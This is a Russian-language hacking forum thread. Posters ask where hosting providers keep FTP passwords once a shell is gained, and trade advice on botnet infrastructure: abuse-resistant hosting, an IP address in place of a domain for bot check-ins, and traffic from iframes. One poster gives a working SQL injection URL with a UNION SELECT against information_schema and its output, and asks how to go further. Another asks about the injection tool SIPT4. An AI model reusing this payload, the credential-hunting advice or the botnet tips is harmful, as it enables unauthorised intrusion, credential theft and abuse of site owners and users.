Честно говоря вовсе не обязательно хранить пароли на сервере. Их элементрано можно хранить например в БД. Или в .txt на совершенно другом сервере. Всё по ситуации
Ну как то ведь авторизация проходит, при логине юзера.С чем то сравниваются логины и пасы (я просто не в курсе). В бд их нет.
А я вам так скажу, судя по гуглу (хотя вполне вероятно, я не прав) - у каждого хостера свои индивидуальные способы хранения и проверки паролей ftp доступа, это типо тайна за семью печатями. Скорее всего охренеть какой алгоритм шифрования, даже если и на серваке хранятся. Ну наверное они таки об таких вещах позаботились. Не всё так просто, даже если и шелл.
Pashkela Понятно. Ну если о багах не позаботились, думаю и с фтп попроще будет =) Просто интересны наиболее часто встречающиеся места. AkyHa_MaTaTa В смысле какой? Конкретизируй вопрос.
не факт, можно купить хостингт и залить свой "шелл" вполне легально (зарегить сайт там, где ломаешь), дырки нет, но это не значит, что "можно будет смотреть все фтп-пароли". Хотя бы даже исходя из таких соображений, что ты потенциальный клиент, но безопасность безопасностью
всмысле. то есть можно забабахать денвер на комп запустить и будет как абузоустойкий ты хочешь сказать?
2 Pashkela Дыры имеются ввиду на сайте самого хостера. Да и если толком, то чтобы таких казусов не возникало, safe_mod надо включать. Ты меня не удивил )))
diznt Можно, но твоему ботнету придёт пиз**ц после первой абузы. Да и что это будет за ботнет, если владелец не может себе абуз хост купить? =) На ломанных запалят быстро. Трафф ты собираешься гнать с фрэймов как я понимаю? Вот от одного админа одна абуза, и всё.
при чём тут денвер и домен ?? хостер, да, лучше чтобы был абузный.. но про хост речь не шла .. а домен тебе зачем спрашиваю!? если можешь вместо домена ip юзать.
Набери в браузере 77.88.21.3 попадёшь на яндекс. Вот так и ты, можешь юзать вместо домена - ip. Тебе ведь не клиентов заманивать, а трафф принимать. Для ботнета самое то.
эм.. ну что сказать, сразу напрашивается вопрос - тебе это надо ? по сабжу: боты же должны куданить отстукивать? или к ним снизойдёт озарение и они сами придумают чтобы такого сделать .. так вот, какая им разница куда стучать?? -- и вообще, нах домен абузный, ты ж не спамить домен собрался .. ну допустим на связку один домен/ip, а на ботнет уже стоит другой .. хотя на одном тож никто не мешает делать .. но энто лишнее паливо всёже .. хотя на абузном серваке пох ваще.
хелп. нашёл скулю http://site.ru/index.php?id_page=216&id_news=36+union+select+1,2,3,concat(table_name,0x3a,column_name),5+from+information_schema.columns вывело кучу всего TRIGGERS:CREATED TRIGGERS:SQL_MODE TRIGGERSEFINER USER_PRIVILEGES:GRANTEE USER_PRIVILEGES:TABLE_CATALOG USER_PRIVILEGESRIVILEGE_TYPE USER_PRIVILEGES:IS_GRANTABLE VIEWS:TABLE_CATALOG (часть списка) Но читать их не получается, всегда ошибка Table doesn't exist Можно что-нибудь сделать?
вывелось так information_schema:TRIGGERS:CREATED information_schema:TRIGGERS:SQL_MODE information_schema:TRIGGERSEFINER information_schema:USER_PRIVILEGES:GRANTEE information_schema:USER_PRIVILEGES:TABLE_CATALOG information_schema:USER_PRIVILEGESRIVILEGE_TYPE information_schema:USER_PRIVILEGES:IS_GRANTABLE
У меня пара вопросов по программе SIPT4: 1.Почему в некоторых случаях программа может определить принтабельные поля в инъекции, в других нет? При том что инъекции все простые и одинаковые. 2.Что означает каждая из цифр в поле "принтабельные поля": {2},4,5. Я так понимаю, 4 и 5 - это номер поля, а что означает цифра в фигурных скобках? Но это точно не число принтабельных полей. Был бы признателен еще если бы кто-нибудь дал линк на подробный мануал по проге (а лучше видео).
